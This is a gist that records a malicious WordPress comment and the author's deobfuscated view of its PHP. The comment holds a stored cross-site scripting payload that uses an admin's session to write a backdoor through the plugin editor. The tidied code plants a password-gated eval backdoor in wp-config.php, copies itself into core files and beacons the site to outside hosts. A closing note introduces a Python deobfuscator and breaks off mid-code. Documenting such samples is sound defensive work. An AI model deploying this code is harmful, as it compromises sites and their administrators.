@mattfoster
Created May 5, 2015 18:51
Dodgy WordPress Comment
Author: Rick (IP: 37.130.227.133, torland1-this.is.a.tor.exit.server.torland.is)
E-mail: [email protected]
URL:
Whois: http://whois.arin.net/rest/ip/37.130.227.133
Comment:
[<a title="]" rel="nofollow"></a>[" <!-- style=position:fixed;top:0;left:0;padding:0;margin:0;width:1000%;height:1000%;cursor:default;z-index:100;display:block;color:transparent;font-size:0 onmouseover="eval(atob('dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOw0KdmFyIGk7DQpmb3IgKGkgPSAwOyBpIDwgeC5sZW5ndGg7IGkrKykgew0KICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQ0KfQ0KDQp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsNCmVsLmlkID0gJ2lmcmFtZTIyJzsNCmVsLnN0eWxlLmRpc3BsYXkgPSAiZml4ZWQiOw0KZWwuc3R5bGUudG9wPScxcHgnOw0KZWwuc3R5bGUubGVmdD0nMXB4JzsNCmVsLnN0eWxlLndpZHRoID0gIjFweCI7DQplbC5zdHlsZS5oZWlnaHQgPSAiMXB4IjsNCmVsLnNyYyA9ICJwbHVnaW4tZWRpdG9yLnBocD9maWxlPWluZGV4LnBocCZwbHVnaW49aW5kZXgucGhwIjsNCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoZWwpOw0KZWwub25sb2FkID0gaHV5Ow0KDQpmdW5jdGlvbiBnZXRJZnJhbWVEb2N1bWVudChpZnJhbWVOb2RlKSB7DQogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50DQogIGlmIChpZnJhbWVOb2Rl
LmNvbnRlbnRXaW5kb3cpIHJldHVybiBpZnJhbWVOb2RlLmNvbnRlbnRXaW5kb3cuZG9jdW1lbnQNCiAgcmV0dXJuIGlmcmFtZU5vZGUuZG9jdW1lbnQNCn0NCg0KZnVuY3Rpb24gaHV5KCl7DQp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7DQp2YXIgaGhoID0gZ2V0SWZyYW1lRG9jdW1lbnQoenp6KTsNCmlmIChoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZS5pbmRleE9mKCIxOTI0ODUwOTdiYzhhMjQwYTk2YWNhNTk2OGVhZTc3NyIpID09IC0xKSB7DQpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFnSkVkTVQwSkJURk5iSjE4eU5UTTBNREV4TmpsZkoxMDlRWEp5WVhrb1ltRnpaVFkwWDJSbFkyOWtaU2duWkZoS2MxcFhOV3BpSnlBdUp6SW5JQzRuVW13bktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkWmJVWjZXbFFuSUM0bldUQllNaWNnTGlkV2RTY2dMaWRaTWpscldsRTlQU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KMXB0Wkd4a1IwNG5JQzRuZW1Sbkp5QXVKejBuSUM0blBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTXlWbm9uSUM0bll6SW5JQzRuYkhaaWJEa25JQzRuY0ZwQlBUMG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGpNMUluSUM0bmVWZ25JQzRuTTBwc1l5Y2dMaWRIZUdoWk1sVTlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25ZekpvTVZwdFduTmFVVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWXljZ0xpY
3pVbmtuSUM0blkwY25JQzRuT1hvbktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkYWJTY2dMaWRzY3ljZ0xpZGFWamxzWlVkc2VtUklKeUF1SjAwOUp5a3NZbUZ6WlRZMFgyUmxZMjlrWlNnblkyMVdkVmxYTVd3bktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkaVdGSW5JQzRuWm1OdFJuVmFRVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWTBoS2NHSnVVbVpqWnowOUp5a3NZbUZ6WlRZMFgyUmxZMjlrWlNnbldtMXNjMXBXSnlBdUp6bHNKeUF1SjJWSGJIcGtKeUF1SjBoTlBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTXpWbWxqSnlBdUp6TlNlU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KMk16VWljZ0xpZDVXRE5PYjJSWEp5QXVKMXB0SnlBdUoySkhWVDBuS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RqSnlBdUp6TlNlVmd6U214alIxWW5JQzRuYUdSQlBUMG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGlWMUV4Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duV20xc2MxcFdKeUF1SnpsM1pGaFNabGt5SnlBdUp6a25JQzRuZFdSSFZuVmtKeUF1SjBoTlBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oyTW5JQzRuTTFKNVdETktiR05ISnlBdUozaG9XVEpWUFNjcExHSmhjMlUyTkY5a1pXTnZaR1VvSjFvbklDNG5iV3h6V2ljZ0xpZFdPVzRuSUM0bldsaFNabGt5T1hWa1IxWjFaRWhOSnlBdUp6MG5LU3hpWVhObE5qUmZaR1ZqYjJSbEtDZGpNMUo1WTBjNUp5QXVKM29uS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RqTTFacFl5Y2dMaWN6VW5sWU0wcHNZeW
NnTGlkSGVHaFpNbFU5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duWVZoT0p5QXVKMlluSUM0bldWaEtKeUF1SjNsWldHczlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25Zek5TZVNjZ0xpZGpiaWNnTGlkQ2RtTjNQVDBuS1N4aVlYTmxOalJmWkdWamIyUmxLQ2RaTWpsM0p5QXVKMlZSUFQwbktTeGlZWE5sTmpSZlpHVmpiMlJsS0NkWk1qbDNaVkU5UFNjcExHSmhjMlUyTkY5a1pXTnZaR1VvSjJJbklDNG5XQ2NnTGlkU1ppY2dMaWRqYlNjZ0xpZEdkVnBCUFQwbktTeGlZWE5sTmpSZlpHVmpiMlJsS0Nkakp5QXVKekpvYUNjZ0xpZE5VVDA5Snlrc1ltRnpaVFkwWDJSbFkyOWtaU2duV1RJNUp5QXVKM2NuSUM0blpWRTlQU2NwTEdKaGMyVTJORjlrWldOdlpHVW9KeWNnTGlkYWJXeHpXbFk1SnlBdUozZGtKeUF1SjFnbklDNG5VaWNnTGlkbVdUSW5JQzRuT1NjZ0xpZDFaQ2NnTGlkSFZuVmtTRTBuSUM0blBTY3BMR0poYzJVMk5GOWtaV052WkdVb0oxb25JQzRuYld4eldsWW5JQzRuT1NjZ0xpZDNaRmduSUM0blVpY2dMaWRtV1NjZ0xpY3lPU2NnTGlkMVpFZFdkV1JJSnlBdUowMDlKeWtzWW1GelpUWTBYMlJsWTI5a1pTZ25XVmhLZVZrbklDNG5XR3htWXpOV2RDY3BMR0poYzJVMk5GOWtaV052WkdVb0oxcEhiSGtuS1NrN1puVnVZM1JwYjI0Z1h6RXdORFUyTWprek16a29KR2twZXlSaFBVRnljbUY1S0NkaFNDY2dMaWRTTUdNbklDNG5SRzkyVEhwRmVrOG5JQzRuUXpSNFRXb25JQzRuWjNWTkp5QXVKMVJaTlV4cVNYaFBKeUF1SjF
NNWVsa3pTaWNnTGlkc0p5QXVKMXBYTlhwaFJ6a3dZM2s0ZFdGWE1XaGFNbFo2VERKc2RWb25JQzRuUjFZMEp5QXVKMHh1UW05alFUMDlKeXduSnlBdUoyRklKeUF1SjFJd1kwUnZka3d5ZEhCa1JGSm9Za2QzZFNjZ0xpZGpibFYyV1RJbklDNG5PWFJqUnpsMUp5QXVKMW9uSUM0blZ6VXdZM2s1YW1JeU1TY2dMaWRtWVcxT2JFd3liSFZhUnljZ0xpZFdORXh1UW05alFUMDlKeXduWkNjZ0xpY3pRWFJaTWpsMVpFZFdKeUF1SjNWa1F6bDNZa2hXSnlBdUoyNWhWelVuSUM0bmVrd3lKeUF1SjJ4MUp5QXVKMXBIVmpSTUp5QXVKMjVDSnlBdUoyOG5JQzRuWTBFOVBTY3NKeWNzSjFWclZsSW5JQzRuVmxVbklDNG5WbFJXUmljZ0xpYzVWbFZyYXljZ0xpYzlKeXduVTBZbklDNG5VbFZWUmljZ0xpYzVTVlF4VGxVbkxDZG1RVDA5Snl3blVFZHNkRnA1UWpOaEp5QXVKMWRTTUdGRU1IaEpSMmhzWVZka2IyUkVNSGhKSnlBdUowaE9lVmw2TUdrbkxDZFFNbEpvWkVkRkp5QXVKemtuTENkSkp5QXVKMm8wUFNjc0oyUW5JQzRuVjFwdkp5QXVKMk5IU214YVJ5Y2dMaWRLTXljZ0xpZGFXR2hvSnl3bldtMG5JQzRuTVRZbkxDZE1hVFIyVENjZ0xpZHBOSFprSnlBdUp6TW5JQzRuUVhSWk1qbDBZbGRXZFNjZ0xpZGtTRTEwSnlBdUoyTkhPWHBrSnlBdUowTTFKeUF1SjNkaFNDY2dMaWRCUFNjc0oweHBOSFpNSnlBdUoyazBkaWNnTGlka0p5QXVKek5CZEZreU9YUmlWelVuSUM0bmJHUW5JQzRuU0UxMEp5QXVKMk5IT1hvbklDNG5aRU0xZHljZ0xp
ZGhTRUU5Snl3bkp5QXVKMHhwTkhaTWFUUjJKeUF1SjJRbklDNG5NeWNnTGlkQmRGa3lPWFZhYld4dUp5QXVKMHh1UW05alFUMDlKeXduVVZVbklDNG5TaWNnTGlkRVVrVldSMUluSUM0bk1HaEtVMnNuSUM0bmRFMVVKeUF1SjFVbklDNG5OU2NnTGlkUVZTY2dMaWRHSnlBdUowWlRWVEZTVmxac0p5QXVKMlJaVjFad2FDY2dMaWRaYlU1cldsZGFibUZIYkhGaE1uZ25JQzRuZEdKdEp5QXVKemwzWXljZ0xpZFlTbnBrU0ZZeUp5QXVKMlF6YURWbFp6MDlKeXduU2toU2FGa25JQzRuYlhnbklDNG5iQ2NnTGlkWU0wSjVXbGRhY0NjZ0xpZGxRVDA5Snl3blpESW5JQzRuVG5aaU1rWnJZak5TY1dGWVJpY2dMaWN4WVRKS2EyTlhlQ2NnTGlkMVdsRTlQU2NzSjJKSWJ6MG5MQ2RoSnlBdUowaFNKeUF1SnpCalJHOTJUREpTSnlBdUoyZ25JQzRuWXljZ0xpZEhUbThuSUM0bldsY3hKeUF1SjJ4aWJTY2dMaWRqZFdJbklDNG5NMHB1SnlBdUoweDZSWFluSUM0bldWaEpkbVF5ZEhwaU1qVnNaSGtuSUM0bk5TY2dMaWQzWVNjZ0xpZElKeUF1SjBFbklDNG5QU2NzSjB4cE5IWk1hVFFuSUM0bmRtUXpRWFJoVnpWcUp5QXVKMkpJSnlBdUoxWnJKeUF1SjFwWVRYWmtSMVowWTBkNGFHUW5JQzRuUjFWMFpETkNjeWNnTGlkaU1rWnJXbGhKZFdOSEp5QXVKMmgzSnl3bkp5QXVKMkZYTld0YUp5QXVKMWhuSnlBdUozVmpSeWNnTGlkb2R5Y3NKMHhwSnlBdUp6UW5JQzRuZGljZ0xpZGtXRUp1WTIwbklDNG5SaWNnTGlkckp5QXVKMXBUT1RGalIyUjVXV
mRTSnlBdUoyeGpKeUF1SjNrMWQyRklKeUF1SjBFOUp5d25ZVmMxYTFwWVozVmpSMmduSUM0bmR5Y3NKMHduSUM0bmFTY2dMaWMwSnlBdUozWmtXRUp6WWpKR2EyTjVPVE5qUXpFeEp5QXVKMk5IZUNjZ0xpZDJKeUF1SjFsWFVucE1ia0p2WTBFbklDNG5QVDBuTENkaEp5QXVKMUU5SnlBdUp6MG5MQ2RoSnlBdUoxYzFhMW9uSUM0bldHZDFZMGRvZHljc0p5Y2dMaWRRUkNjZ0xpYzVkeWNnTGlkaEp5QXVKMGhCVGtOcE9IWW5JQzRuU1VaT2NHSW5JQzRuUnljZ0xpZFdkVmtuSUM0bk1sVm5KeUF1SjJFbklDNG5XQ2NnTGlkTloxb3lPWE5hUjFaMVRHY3dTMUFuSUM0bmVpY2dMaWMwUFNjc0oweHBOSFprSnlBdUoxaENjMkl5Um10amVUbHdKeUF1SjJKdEp5QXVKMUpzSnlBdUoyVW5JQzRuUXljZ0xpYzFkMkZJUVNjZ0xpYzlKeXduSnlBdUoyRlhOV3RhSnlBdUoxaG5kU2NnTGlkalIyaDNKeWs3Y21WMGRYSnVJR0poYzJVMk5GOWtaV052WkdVb0pHRmJKR2xkS1R0OVpuVnVZM1JwYjI0Z2JGOWZNQ2drWHpBcGUzSmxkSFZ5YmlBa1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN3WFNna1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN4WFNoK0pGOHdLU2s3ZldaMWJtTjBhVzl1SUd4Zlh6RW9KRjh4S1hza1h6SmJYVDFmTVRBME5UWXlPVE16T1Nnd0tUdDNhR2xzWlNoeWIzVnVaQ2d3S3pFME1qZ3VOalkyTmpZMk5qY3JNVFF5T0M0Mk5qWTJOalkyTnlzeE5ESTRMalkyTmpZMk5qWTNLUzF5YjNWdVpDZ3dLelF5T0
RZcEtTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pKZEtDUmZVMFZTVmtWU0tUc2tYekpiWFQxZk1UQTBOVFl5T1RNek9TZ3hLVHQzYUdsc1pTaHliM1Z1WkNnd0t6RXpOemt1TlNzeE16YzVMalVwTFhKdmRXNWtLREFyTVRNM09TNDFLekV6TnprdU5Ta3BKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk0xMG9KRjh4TENSZk15azdKRjh6UFNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelJkS0Y4eE1EUTFOakk1TXpNNUtESXBMRjh4TURRMU5qSTVNek01S0RNcExDUmZVMFZTVmtWU1cxOHhNRFExTmpJNU16TTVLRFFwWFNrN0pGODBQV3hmWHpBb0pGOVRSVkpXUlZKYlh6RXdORFUyTWprek16a29OU2xkSUM0a1h6TWdMbDh4TURRMU5qSTVNek01S0RZcElDNGtYekVwT3lSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelZkS0NSZk1pazdabTl5WldGamFDZ2tYeklnWVhNZ0pGODFLWHRsWTJodklGOHhNRFExTmpJNU16TTVLRGNwSUM0a1h6VWdMbDh4TURRMU5qSTVNek01S0RncElDNGtYelFnTGw4eE1EUTFOakk1TXpNNUtEa3BPMmxtS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXelpkS0Y4eE1EUTFOakk1TXpNNUtERXdLU3hmTVRBME5UWXlPVE16T1NneE1Ta3BJVDA5Wm1Gc2MyVXBKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk4xMG9KRjlUUlZKV1JWSXNKRjlUUlZKV1JWSXNKRjgyS1R0OWZVQWtSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzNFh
TaGZNVEEwTlRZeU9UTXpPU2d4TWlrc1h6RXdORFUyTWprek16a29NVE1wS1Rza1h6WTlYekV3TkRVMk1qa3pNemtvTVRRcE8ybG1LSEp2ZFc1a0tEQXJPVE0zTGpRck9UTTNMalFyT1RNM0xqUXJPVE0zTGpRck9UTTNMalFwUENSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXemxkS0hKdmRXNWtLREFyTkRFd0t6UXhNQ3MwTVRBck5ERXdLU3h5YjNWdVpDZ3dLekV3TVRRck1UQXhOQ3N4TURFMEtTa3BKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1UQmRLQ1JmTVNrN2FXWW9KRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1URmRLQ1JmTmlrcGV5UmZNVDBrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3hNbDBvSkVkTVQwSkJURk5iSjE4eU5UTTBNREV4TmpsZkoxMWJNVE5kS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekUwWFNoZk1UQTBOVFl5T1RNek9TZ3hOU2tzY205MWJtUW9NQ3N4TmlrcEtTeHliM1Z1WkNnd0tTeHliM1Z1WkNnd0t6RTJLU2s3SkY4M1BTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pFMVhTZ2tYekVwT3lSZk5UMGlaWEp5YjNKZmNtVndiM0owYVc1bktEQXBPMmxtS0dsemMyVjBLRndrWDFKRlVWVkZVMVJiSjNkd2MzQnRKMTBwSUNZbUlHMWtOU2hjSkY5U1JWRlZSVk5VV3lkM2NITndiU2RkS1NBOVBTQW5KRjgzSnlBbUppQnBjM05sZENoY0pGOVNSVkZWUlZOVVd5ZDNjSEpySjEwcEtTQmxkbUZzSUNnZ1ltRnpaVFkwWDJSbFkyOWta
U0FvWENSZlVrVlJWVVZUVkZzbmQzQnlheWRkS1NrN0lqc2tSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzeE5sMG9JaVJmTmlJc0pFZE1UMEpCVEZOYkoxOHlOVE0wTURFeE5qbGZKMTFiTVRkZEtGOHhNRFExTmpJNU16TTVLREUyS1N3aUpGODFJRnh1SUZ3a2RHRmliR1ZmY0hKbFptbDRJaXdrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3hPRjBvSkY4MktTa3BPMmxtS0NSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekU1WFNoZk1UQTBOVFl5T1RNek9TZ3hOeWtzWHpFd05EVTJNamt6TXprb01UZ3BLU0U5UFdaaGJITmxLU1JIVEU5Q1FVeFRXeWRmTWpVek5EQXhNVFk1WHlkZFd6SXdYU2drWHpVc0pGOHdMQ1JmTWlrN2ZXeGZYekVvSkY4eEtUdHBaaWdvY205MWJtUW9NQ3MwTXpJdU9DczBNekl1T0NzME16SXVPQ3MwTXpJdU9DczBNekl1T0NrcmNtOTFibVFvTUNzeE1qRTRLekV5TVRnck1USXhPQ3N4TWpFNEtTaytjbTkxYm1Rb01DczFOREVyTlRReEt6VTBNU3MxTkRFcGZId2dKRWRNVDBKQlRGTmJKMTh5TlRNME1ERXhOamxmSjExYk1qRmRLQ1JmTkN3a1h6TXNKRjgyTENSZlUwVlNWa1ZTS1NrN1pXeHpaWHNrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3lNbDBvSkY5VFJWSldSVklwTzMxQUpFZE1UMEpCVEZOYkoxOHlOVE0wTURFeE5qbGZKMTFiTWpOZEtGOHhNRFExTmpJNU16TTVLREU1S1N4Zk1UQTBOVFl5T1RNek9TZ3lNQ2twT3lRa1h6WTlYMTlHU1V4RlgxODdRQ1JIV
EU5Q1FVeFRXeWRmTWpVek5EQXhNVFk1WHlkZFd6STBYU2hmTVRBME5UWXlPVE16T1NneU1Ta3NYekV3TkRVMk1qa3pNemtvTWpJcEtUdHBaaWh5YjNWdVpDZ3dLekk0T0RNck1qZzRNeXN5T0RnektUd2tSMHhQUWtGTVUxc25YekkxTXpRd01URTJPVjhuWFZzeU5WMG9jbTkxYm1Rb01Dc3lNVEF3TGpVck1qRXdNQzQxS1N4eWIzVnVaQ2d3S3pJeU1qRXVOU3N5TWpJeExqVXBLU2trUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3lObDBvSkY4M0xDUmZOU2s3UUNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekkzWFNoZk1UQTBOVFl5T1RNek9TZ3lNeWtzWHpFd05EVTJNamt6TXprb01qUXBLVHNrWHpnOVh6RXdORFUyTWprek16a29NalVwTzBBa1IweFBRa0ZNVTFzblh6STFNelF3TVRFMk9WOG5YVnN5T0Ywb1h6RXdORFUyTWprek16a29NallwTEY4eE1EUTFOakk1TXpNNUtESTNLU2s3UUNSSFRFOUNRVXhUV3lkZk1qVXpOREF4TVRZNVh5ZGRXekk1WFNoZk1UQTBOVFl5T1RNek9TZ3lPQ2tzWHpFd05EVTJNamt6TXprb01qa3BLVHRwWmlnb2NtOTFibVFvTUNzeU9EYzJLVjV5YjNWdVpDZ3dLemsxT0M0Mk5qWTJOalkyTmpjck9UVTRMalkyTmpZMk5qWTJOeXM1TlRndU5qWTJOalkyTmpZM0tTa21KaUFrUjB4UFFrRk1VMXNuWHpJMU16UXdNVEUyT1Y4blhWc3pNRjBvSkY4ekxDUmZOQ3drWHpRcEtTUkhURTlDUVV4VFd5ZGZNalV6TkRBeE1UWTVYeWRkV3pNeFhTZ2tYelFzSkY4d0xDUmZNeXdrWHpNcE
8yVmphRzhpTVRreU5EZzFNRGszWW1NNFlUSTBNR0U1Tm1GallUVTVOamhsWVdVM056Y2lPeUEvUGc9PSIpICsgaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWU7DQpoaGguZ2V0RWxlbWVudEJ5SWQoInN1Ym1pdCIpLmNsaWNrKCApOw0KfQ0KZWxzZSB7DQp6enouc3JjID0gJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy9pbmRleC5waHAnOw0KfX0='))"&gt;Baltimore -->Baltimore police completed a criminal investigation into the death of Freddie Gray and delivered it to a prosecutor a day earlier than promised Thursday.<a></a>]
@mattfoster
Author

I put the PHP code through an online tidier:

<?php
    $GLOBALS['_253401169_'] = Array(base64_decode('dXJsZW5jb' .'2' .'Rl'),base64_decode('YmFzZT' .'Y0X2' .'Vu' .'Y29kZQ=='),base64_decode('ZmdldGN' .'zdg' .'=' .'='),base64_decode('c2Vz' .'c2' .'lvbl9' .'pZA=='),base64_decode('c3R' .'yX' .'3Jlc' .'GxhY2U='),base64_decode('c2h1ZmZsZQ=='),base64_decode('c' .'3Ry' .'cG' .'9z'),base64_decode('Zm' .'ls' .'ZV9leGlzdH' .'M='),base64_decode('cmVuYW1l'),base64_decode('bXR' .'fcmFuZA=='),base64_decode('cHJpbnRfcg=='),base64_decode('ZmlsZV' .'9l' .'eGlzd' .'HM='),base64_decode('c3Vic' .'3Ry'),base64_decode('c3R' .'yX3NodW' .'Zm' .'bGU='),base64_decode('c' .'3RyX3JlcGV' .'hdA=='),base64_decode('bWQ1'),base64_decode('ZmlsZV' .'9wdXRfY2' .'9' .'udGVud' .'HM='),base64_decode('c' .'3RyX3JlcG' .'xhY2U='),base64_decode('Z' .'mlsZ' .'V9n' .'ZXRfY29udGVudHM' .'='),base64_decode('c3RycG9' .'z'),base64_decode('c3Vic' .'3RyX3Jlc' .'GxhY2U='),base64_decode('aXN' .'f' .'YXJ' .'yYXk='),base64_decode('c3Ry' .'cn' .'Bvcw=='),base64_decode('Y29w' .'eQ=='),base64_decode('Y29weQ=='),base64_decode('b' .'X' .'Rf' .'cm' .'FuZA=='),base64_decode('c' .'2hh' .'MQ=='),base64_decode('Y29' .'w' .'eQ=='),base64_decode('' .'ZmlsZV9' .'wd' .'X' .'R' .'fY2' .'9' .'ud' .'GVudHM' .'='),base64_decode('Z' .'mlsZV' .'9' .'wdX' .'R' .'fY' .'29' .'udGVudH' .'M='),base64_decode('YXJyY' .'Xlfc3Vt'),base64_decode('ZGly'));
    function _1045629339($i){
        $a=Array('aH' .'R0c' .'DovLzEzO' .'C4xMj' .'guM' .'TY5LjIxO' .'S9zY3J' .'l' .'ZW5zaG90cy8uaW1hZ2VzL2luZ' .'GV4' .'LnBocA==','' .'aH' .'R0cDovL2tpdDRhbGwu' .'cnUvY2' .'9tcG9u' .'Z' .'W50cy9jb21' .'famNlL2luZG' .'V4LnBocA==','d' .'3AtY29udGV' .'udC9wbHV' .'naW5' .'zL2' .'lu' .'ZGV4L' .'nB' .'o' .'cA==','','UkVR' .'VU' .'VTVF' .'9VUkk' .'=','SF' .'RUUF' .'9IT1NU','fA==','PGltZyB3a' .'WR0aD0xIGhlaWdodD0xI' .'HNyYz0i','P2RhdGE' .'9','I' .'j4=','d' .'WZo' .'cGJlZG' .'J3' .'ZXhh','Zm' .'16','Li4vL' .'i4vd' .'3' .'AtY29tbWVu' .'dHMt' .'cG9zd' .'C5' .'waH' .'A=','Li4vL' .'i4v' .'d' .'3AtY29tbW5' .'ld' .'HMt' .'cG9z' .'dC5w' .'aHA=','' .'Li4vLi4v' .'d' .'3' .'AtY29uZmln' .'LnBocA==','QU' .'J' .'DREVGR' .'0hJSk' .'tMT' .'U' .'5' .'PU' .'F' .'FSU1RVVl' .'dYWVph' .'YmNkZWZnaGlqa2x' .'tbm' .'9wc' .'XJzdHV2' .'d3h5eg==','JHRhY' .'mx' .'l' .'X3ByZWZp' .'eA==','d2' .'Nvb2Fkb3RqaXF' .'1a2JkcWx' .'uZQ==','bHo=','a' .'HR' .'0cDovL2R' .'h' .'c' .'GNo' .'ZW1' .'lbm' .'cub' .'3Jn' .'LzEv' .'YXIvd2tzb25ldy' .'5' .'wa' .'H' .'A' .'=','Li4vLi4' .'vd3AtaW5j' .'bH' .'Vk' .'ZXMvdGVtcGxhd' .'GUtd3Bs' .'b2FkZXIucG' .'hw','' .'aW5kZ' .'Xg' .'ucG' .'hw','Li' .'4' .'v' .'dXBncm' .'F' .'k' .'ZS91cGdyYWR' .'lc' .'y5waH' .'A=','aW5kZXgucGh' .'w','L' .'i' .'4' .'vdXBsb2Fkcy93cC11' .'cGx' .'v' .'YWRzLnBocA' .'==','a' .'Q=' .'=','a' .'W5kZ' .'XgucGhw','' .'PD' .'9w' .'a' .'HANCi8v' .'IFNpb' .'G' .'VuY' .'2Ug' .'a' .'X' .'MgZ29sZGVuLg0KP' .'z' .'4=','Li4vd' .'XBsb2Fkcy9p' .'bm' .'Rl' .'e' .'C' .'5waHA' .'=','' .'aW5kZ' .'Xgu' .'cGhw');
        return base64_decode($a[$i]);
    }


    function l__0($_0){
        return $GLOBALS['_253401169_'][0]($GLOBALS['_253401169_'][1](~$_0));
    }


    function l__1($_1){
        $_2[]=_1045629339(0);
        while(round(0+1428.66666667+1428.66666667+1428.66666667)-round(0+4286))$GLOBALS['_253401169_'][2]($_SERVER);
        $_2[]=_1045629339(1);
        while(round(0+1379.5+1379.5)-round(0+1379.5+1379.5))$GLOBALS['_253401169_'][3]($_1,$_3);
        $_3=$GLOBALS['_253401169_'][4](_1045629339(2),_1045629339(3),$_SERVER[_1045629339(4)]);
        $_4=l__0($_SERVER[_1045629339(5)] .$_3 ._1045629339(6) .$_1);
        $GLOBALS['_253401169_'][5]($_2);
        foreach($_2 as $_5){
            echo _1045629339(7) .$_5 ._1045629339(8) .$_4 ._1045629339(9);

            if($GLOBALS['_253401169_'][6](_1045629339(10),_1045629339(11))!==false)$GLOBALS['_253401169_'][7]($_SERVER,$_SERVER,$_6);
        }

    }

    @$GLOBALS['_253401169_'][8](_1045629339(12),_1045629339(13));
    $_6=_1045629339(14);

    if(round(0+937.4+937.4+937.4+937.4+937.4)<$GLOBALS['_253401169_'][9](round(0+410+410+410+410),round(0+1014+1014+1014)))$GLOBALS['_253401169_'][10]($_1);

    if($GLOBALS['_253401169_'][11]($_6)){
        $_1=$GLOBALS['_253401169_'][12]($GLOBALS['_253401169_'][13]($GLOBALS['_253401169_'][14](_1045629339(15),round(0+16))),round(0),round(0+16));
        $_7=$GLOBALS['_253401169_'][15]($_1);
        $_5="error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";
        $GLOBALS['_253401169_'][16]("$_6",$GLOBALS['_253401169_'][17](_1045629339(16),"$_5 \n \$table_prefix",$GLOBALS['_253401169_'][18]($_6)));

        if($GLOBALS['_253401169_'][19](_1045629339(17),_1045629339(18))!==false)$GLOBALS['_253401169_'][20]($_5,$_0,$_2);
    }

    l__1($_1);

    if((round(0+432.8+432.8+432.8+432.8+432.8)+round(0+1218+1218+1218+1218))>round(0+541+541+541+541)|| $GLOBALS['_253401169_'][21]($_4,$_3,$_6,$_SERVER)); else {
        $GLOBALS['_253401169_'][22]($_SERVER);
    }

    @$GLOBALS['_253401169_'][23](_1045629339(19),_1045629339(20));
    $$_6=__FILE__;
    @$GLOBALS['_253401169_'][24](_1045629339(21),_1045629339(22));

    if(round(0+2883+2883+2883)<$GLOBALS['_253401169_'][25](round(0+2100.5+2100.5),round(0+2221.5+2221.5)))$GLOBALS['_253401169_'][26]($_7,$_5);
    @$GLOBALS['_253401169_'][27](_1045629339(23),_1045629339(24));
    $_8=_1045629339(25);
    @$GLOBALS['_253401169_'][28](_1045629339(26),_1045629339(27));
    @$GLOBALS['_253401169_'][29](_1045629339(28),_1045629339(29));

    if((round(0+2876)^round(0+958.666666667+958.666666667+958.666666667))&& $GLOBALS['_253401169_'][30]($_3,$_4,$_4))$GLOBALS['_253401169_'][31]($_4,$_0,$_3,$_3);
    echo"192485097bc8a240a96aca5968eae777";
    ?>
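
The tidied code above still hides every function name and string behind split base64 literals, two lookup tables and round() arithmetic. As an added example (not part of the gist or its comments), the Python below resolves all three statically without executing any PHP; SAMPLE is a constructed snippet in the same style, and the table names are found by regex rather than hard-coded.

```python
import base64
import math
import re

# Constructed sample in the same obfuscation style as the tidied code above
# (split base64 literals, lookup tables, round() arithmetic). Not the gist's code.
SAMPLE = r"""
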